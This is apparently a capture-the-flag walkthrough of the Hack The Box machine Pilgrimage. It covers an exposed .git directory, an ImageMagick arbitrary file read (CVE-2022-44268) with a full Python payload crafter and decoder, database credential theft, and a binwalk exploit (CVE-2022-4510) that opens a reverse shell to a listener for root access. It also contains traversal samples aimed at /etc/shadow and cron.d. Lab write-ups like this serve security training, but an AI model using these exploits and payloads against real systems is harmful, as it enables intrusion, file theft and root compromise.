Service overview

The machine's IP address is 10.10.11.219. Let's look at the nmap output:

$ nmap -sV -sC -Pn -p1-65535 -vv -oN 10.10.11.219 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 14:44 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:44
Completed Parallel DNS resolution of 1 host. at 14:44, 0.00s elapsed
Initiating Connect Scan at 14:44
Scanning 10.10.11.219 [65535 ports]
Discovered open port 80/tcp on 10.10.11.219
Discovered open port 22/tcp on 10.10.11.219
Connect Scan Timing: About 21.05% done; ETC: 14:47 (0:01:56 remaining)
Connect Scan Timing: About 39.19% done; ETC: 14:47 (0:01:35 remaining)
Connect Scan Timing: About 57.08% done; ETC: 14:47 (0:01:08 remaining)
Completed Connect Scan at 14:47, 139.91s elapsed (65535 total ports)
Initiating Service scan at 14:47
Scanning 2 services on 10.10.11.219
Completed Service scan at 14:47, 6.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.219.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 1.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.24s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Nmap scan report for 10.10.11.219
Host is up, received user-set (0.053s latency).
Scanned at 2023-06-29 14:44:54 EDT for 148s
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOaVAN4bg6zLU3rUMXOwsuYZ8yxLlkVTviJbdFijyp9fSTE6Dwm4e9pNI8MAWfPq0T0Za0pK0vX02ZjRcTgv3yg=
|   256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILGkCiJaVyn29/d2LSyMWelMlcrxKVZsCCgzm6JjcH1W
80/tcp open  http    syn-ack nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.55 seconds

Add the domain from the redirect to /etc/hosts:

10.10.11.219 pilgrimage.htb

Web

An image compression service with user registration.

After uploading an ordinary image, the compressed result shows up in the dashboard.

Let's see what gobuster finds:

$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://pilgrimage.htb -r -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pilgrimage.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/06/29 14:59:55 Starting gobuster in directory enumeration mode
===============================================================
/.git/HEAD            (Status: 200) [Size: 23]
/.hta                 (Status: 403) [Size: 153]
/.htpasswd            (Status: 403) [Size: 153]
/.htaccess            (Status: 403) [Size: 153]
/assets               (Status: 403) [Size: 153]
/index.php            (Status: 200) [Size: 7621]
/tmp                  (Status: 403) [Size: 153]
/vendor               (Status: 403) [Size: 153]
Progress: 4539 / 4615 (98.35%)
===============================================================
2023/06/29 15:00:12 Finished

A publicly exposed .git directory, so the site's source can be recovered.

Git

Use git-dumper to pull the repository down:

$ git-dumper http://pilgrimage.htb pilgrimage-git
...
$ cd pilgrimage-git
$ ls -la
total 26972
drwxr-xr-x 5 kali kali     4096 Jun 29 15:02 .
drwxr-xr-x 3 kali kali     4096 Jun 29 14:57 ..
drwxr-xr-x 6 kali kali     4096 Jun 29 14:59 assets
-rwxr-xr-x 1 kali kali     5538 Jun 29 14:59 dashboard.php
drwxr-xr-x 7 kali kali     4096 Jun 29 15:01 .git
-rwxr-xr-x 1 kali kali     9250 Jun 29 14:59 index.php
-rwxr-xr-x 1 kali kali     6822 Jun 29 14:59 login.php
-rwxr-xr-x 1 kali kali       98 Jun 29 14:59 logout.php
-rwxr-xr-x 1 kali kali 27555008 Jun 29 14:59 magick
-rwxr-xr-x 1 kali kali     6836 Jun 29 14:59 register.php
drwxr-xr-x 4 kali kali     4096 Jun 29 14:59 vendor

Check the binary and the magick version:

$ file magick
magick: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped
$ ./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

Looking inside the PHP files reveals the database path:

$ grep sqlite login.php
  $db = new PDO('sqlite:/var/db/pilgrimage');

ImageMagick

There is a public exploit for this ImageMagick version:

$ searchsploit imagemagick 7.1.0-49
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
ImageMagick 7.1.0-49 - Arbitrary File Read                                            | multiple/local/51261.txt
ImageMagick 7.1.0-49 - DoS                                                            | php/dos/51256.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -m multiple/local/51261.txt
  Exploit: ImageMagick 7.1.0-49 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/51261
     Path: /usr/share/exploitdb/exploits/multiple/local/51261.txt
    Codes: CVE-2022-44268
 Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/htb/piligrimage/51261.txt

The 51261.txt file points to https://github.com/voidz0r/CVE-2022-44268. Build the exploit, passing the file we want to read:

$ git clone https://github.com/voidz0r/CVE-2022-44268
$ cd CVE-2022-44268
$ cargo run "/var/db/pilgrimage"
    Updating crates.io index
  Downloaded bitflags v1.3.2
  Downloaded png v0.17.7
  Downloaded flate2 v1.0.25
  Downloaded adler v1.0.2
  Downloaded miniz_oxide v0.6.2
  Downloaded hex v0.4.3
  Downloaded crc32fast v1.3.2
  Downloaded cfg-if v1.0.0
  Downloaded 8 crates (301.4 KB) in 0.59s
   Compiling crc32fast v1.3.2
   Compiling cfg-if v1.0.0
   Compiling adler v1.0.2
   Compiling bitflags v1.3.2
   Compiling hex v0.4.3
   Compiling miniz_oxide v0.6.2
   Compiling flate2 v1.0.25
   Compiling png v0.17.7
   Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/htb/piligrimage/CVE-2022-44268)
    Finished dev [unoptimized + debuginfo] target(s) in 1m 48s
     Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

Upload the resulting image.png through the web app.

Download the resulting file http://pilgrimage.htb/shrunk/649dd78a28d01-min.png and look inside it:

$ identify -verbose 649dd78a28d01-min.png

The Raw profile type property in the output holds the contents of /var/db/pilgrimage as a hex dump. Copy the hex dump into a text file and convert it back with Python:

$ python3
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> with open("image.txt", "r") as f:
...  data = f.read()
...
>>> data1 = data.replace("\n", "")
>>> data2 = bytes.fromhex(data1)
>>> with open("db.sqlite", "wb") as f:
...  f.write(data2)
...
20480
>>> exit()
$ file db.sqlite
db.sqlite: SQLite 3.x database, last written using SQLite version 3034001, file counter 63, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 63
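The two steps above, crafting the PNG with a profile tEXt chunk and pulling the hex dump back out of the shrunk image, can be done without the Rust tool or the identify/copy-paste detour. The Python script below is an added example, not code from this page or from the voidz0r repository: it builds a minimal PNG whose tEXt chunk has the keyword profile and the value /var/db/pilgrimage (the path found in login.php), and it parses the Raw profile type chunk that the vulnerable ImageMagick writes back, handling both the plain tEXt form and the zlib-compressed zTXt form ImageMagick switches to once the text exceeds 128 bytes. The fake_imagemagick_output helper only constructs a sample image in that same layout so the decoder can be tried offline; the script name profile_leak.py, the output file names and the target path are assumptions.

```python
import struct
import sys
import zlib

# Path the vulnerable ImageMagick will read; taken from login.php on the box.
TARGET_PATH = "/var/db/pilgrimage"

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# 1x1 pixel, 8-bit RGB, no interlace; one scanline = filter byte + one RGB pixel
IHDR_1X1_RGB = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
IDAT_1X1_RGB = zlib.compress(b"\x00\x00\x00\x00")


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_profile_png(path: str) -> bytes:
    """Minimal PNG with a tEXt chunk whose keyword is 'profile' and whose value
    is a file name. The affected ImageMagick treats that as a request to load
    the file as an image profile, so its bytes end up in the converted output."""
    text = b"profile\x00" + path.encode()
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", IHDR_1X1_RGB)
            + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", IDAT_1X1_RGB)
            + png_chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, rejecting non-PNGs and bad CRCs."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def decode_raw_profile(text: bytes) -> bytes:
    """Undo ImageMagick's raw-profile text layout: a newline, the description
    line, the decimal length padded to 8 characters, then hex lines."""
    lines = text.split(b"\n")
    declared = int(lines[2].strip().decode("ascii"))
    blob = bytes.fromhex(b"".join(lines[3:]).decode("ascii"))
    if len(blob) != declared:
        raise ValueError(f"profile declares {declared} bytes, decoded {len(blob)}")
    return blob


def extract_raw_profiles(png: bytes) -> dict:
    """Return {chunk key: file bytes} for every 'Raw profile type ...' chunk."""
    profiles = {}
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        key, _, rest = data.partition(b"\x00")
        if not key.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            rest = zlib.decompress(rest[1:])  # skip the compression-method byte
        profiles[key.decode("latin-1")] = decode_raw_profile(rest)
    return profiles


def fake_imagemagick_output(profiles: dict, compress: bool = True) -> bytes:
    """Constructed sample standing in for the -min.png the server hands back:
    reproduces the raw-profile layout (description, 8-wide length, 36 bytes =
    72 hex characters per line) so the decoder can be exercised offline."""
    out = PNG_SIGNATURE + png_chunk(b"IHDR", IHDR_1X1_RGB)
    for name, blob in profiles.items():
        body = b"\n" + name.encode() + b"\n" + b"%8d " % len(blob)
        for i in range(0, len(blob), 36):
            body += b"\n" + blob[i:i + 36].hex().encode("ascii")
        body += b"\n"
        key = b"Raw profile type " + name.encode()
        if compress:
            out += png_chunk(b"zTXt", key + b"\x00\x00" + zlib.compress(body))
        else:
            out += png_chunk(b"tEXt", key + b"\x00" + body)
    return out + png_chunk(b"IDAT", IDAT_1X1_RGB) + png_chunk(b"IEND", b"")


if __name__ == "__main__":
    # python3 profile_leak.py craft image.png          -> upload image.png
    # python3 profile_leak.py extract shrunk.png db.sqlite
    if len(sys.argv) == 3 and sys.argv[1] == "craft":
        with open(sys.argv[2], "wb") as f:
            f.write(build_profile_png(TARGET_PATH))
    elif len(sys.argv) == 4 and sys.argv[1] == "extract":
        with open(sys.argv[2], "rb") as f:
            found = extract_raw_profiles(f.read())
        for key, blob in found.items():
            print(f"{key!r}: {len(blob)} bytes")
        if found:
            with open(sys.argv[3], "wb") as f:
                f.write(next(iter(found.values())))
```

The decoder compares the byte count declared in the profile header with what it actually decoded, so a truncated or mangled copy fails loudly instead of yielding a silently corrupt SQLite file, which is the failure mode of the copy-and-paste route above.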

Then open the database in any SQLite viewer.

It holds the credentials emily:abigchonkyboi123.

SSH

Connect over SSH with these credentials.

$ ssh emily@pilgrimage.htb
abigchonkyboi123

User flag

emily@pilgrimage:~$ id
uid=1000(emily) gid=1000(emily) groups=1000(emily)
emily@pilgrimage:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:2d:07 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
emily@pilgrimage:~$ cat user.txt
cb8917b46b0c38f7de6c121e84663d62


Privilege escalation

ps aux shows /bin/bash /usr/sbin/malwarescan.sh running as root:

emily@pilgrimage:~$ ps aux | grep malware
root         626  0.0  0.0   6816  2988 ?        Ss   05:10   0:00 /bin/bash /usr/sbin/malwarescan.sh
root         651  0.0  0.0   6816  2396 ?        S    05:10   0:00 /bin/bash /usr/sbin/malwarescan.sh
emily       1861  0.0  0.0   6240   708 pts/2    S+   05:24   0:00 grep malware

Let's look inside this file:

$ cat /usr/sbin/malwarescan.sh

#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

inotifywait watches /var/www/pilgrimage.htb/shrunk/ and hands every newly created file to binwalk -e, running as root; the -e flag means binwalk not only scans the upload but also extracts anything it recognises inside it. Let's check the binwalk version:

emily@pilgrimage:~$ binwalk

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

...

Search for an exploit:

$ searchsploit binwalk
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE)                                       | python/remote/51249.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -m python/remote/51249.py
  Exploit: Binwalk v2.3.2 - Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/51249
     Path: /usr/share/exploitdb/exploits/python/remote/51249.py
    Codes: CVE-2022-4510
 Verified: False
File Type: ASCII text, with very long lines (614)
Copied to: /home/kali/Desktop/htb/piligrimage/51249.py

Use it to generate an image carrying the payload, and open a listener at the same time:

$ python3 51249.py image.png 10.10.14.194 443

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------

################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################

You can now rename and share binwalk_exploit and start your local netcat listener.
$ rlwrap nc -lnvp 443

Base64-encode the image locally, then decode it on the server straight into the watched directory (the exploit writes a file called binwalk_exploit, renamed here so it looks like a shrunk image):

# locally; copy the BASE64 output
$ mv binwalk_exploit binwalk_exploit-min.png
$ base64 -w 0 binwalk_exploit-min.png
# on the server, paste it in place of BASE64
emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ echo BASE64 | base64 -d > binwalk_exploit-min.png

The connection comes in immediately.
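The bug class behind CVE-2022-4510 is an extractor writing an archive entry to os.path.join(output_dir, entry_name) without checking where the joined path lands; with malwarescan.sh running binwalk -e as root, an entry name built from ../ components can drop a file anywhere on the box, and the public exploit uses that to plant a plugin in binwalk's user plugin directory, which binwalk loads on its next start. The Python below is an added illustration of that pattern next to a hardened check; it is not binwalk's extractor code and not the 51249.py exploit. The sample entry names, the output directory and the plugin path ~/.config/binwalk/plugins used in the sample are assumptions for the demonstration.

```python
import os

# Constructed sample of entry names as a crafted archive could carry them:
# one ordinary file, one absolute name and two traversal attempts. The last
# one targets the per-user plugin directory binwalk loads at start-up, which
# is what the public CVE-2022-4510 exploit relies on when binwalk runs as root.
SAMPLE_ENTRIES = [
    "rootfs/etc/passwd",
    "/etc/shadow",
    "good/../../../etc/cron.d/evil",
    "../../../../../../root/.config/binwalk/plugins/binwalk.py",
]


def unsafe_extract_path(out_dir: str, entry_name: str) -> str:
    """The vulnerable pattern: trust the name from the archive and join it to
    the output directory. '..' components walk out of out_dir and an absolute
    name makes os.path.join discard out_dir entirely. Illustration only."""
    return os.path.normpath(os.path.join(out_dir, entry_name))


def safe_extract_path(out_dir: str, entry_name: str) -> str:
    """Hardened form: treat every name as relative, resolve both sides and
    refuse anything whose real path is not inside out_dir."""
    root = os.path.realpath(out_dir)
    candidate = os.path.realpath(os.path.join(root, entry_name.lstrip("/")))
    # commonpath rather than startswith: 'out_dir2/x' must not pass as inside 'out_dir'
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"entry escapes output directory: {entry_name!r}")
    return candidate


def escapes_output_dir(out_dir: str, entry_name: str) -> bool:
    """Does the naive join land outside out_dir? With the root-run
    binwalk -e from malwarescan.sh, that is where the file would be written."""
    root = os.path.realpath(out_dir)
    target = os.path.realpath(unsafe_extract_path(out_dir, entry_name))
    return os.path.commonpath([root, target]) != root


def audit_entries(out_dir: str, entries) -> dict:
    """Run the hardened check over a list of names and report the verdicts."""
    report = {"allowed": [], "blocked": []}
    for name in entries:
        try:
            safe_extract_path(out_dir, name)
            report["allowed"].append(name)
        except ValueError:
            report["blocked"].append(name)
    return report


if __name__ == "__main__":
    # Directory binwalk -e would create next to the dropped file (assumed name).
    out_dir = "/var/www/pilgrimage.htb/shrunk/_binwalk_exploit-min.png.extracted"
    for name in SAMPLE_ENTRIES:
        print(f"{name!r:62} naive -> {unsafe_extract_path(out_dir, name)}"
              f"  escapes={escapes_output_dir(out_dir, name)}")
    print(audit_entries(out_dir, SAMPLE_ENTRIES))
```

The same check applies to the malwarescan.sh design itself: any extractor run over untrusted uploads should at least write under a directory it has verified the target stays inside, and should not be running as root in the first place.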

Root flag

$ cd /root
$ id
uid=0(root) gid=0(root) groups=0(root)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:2d:07 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
$ cat root.txt
546c2adcd569529c77300134a676ff53
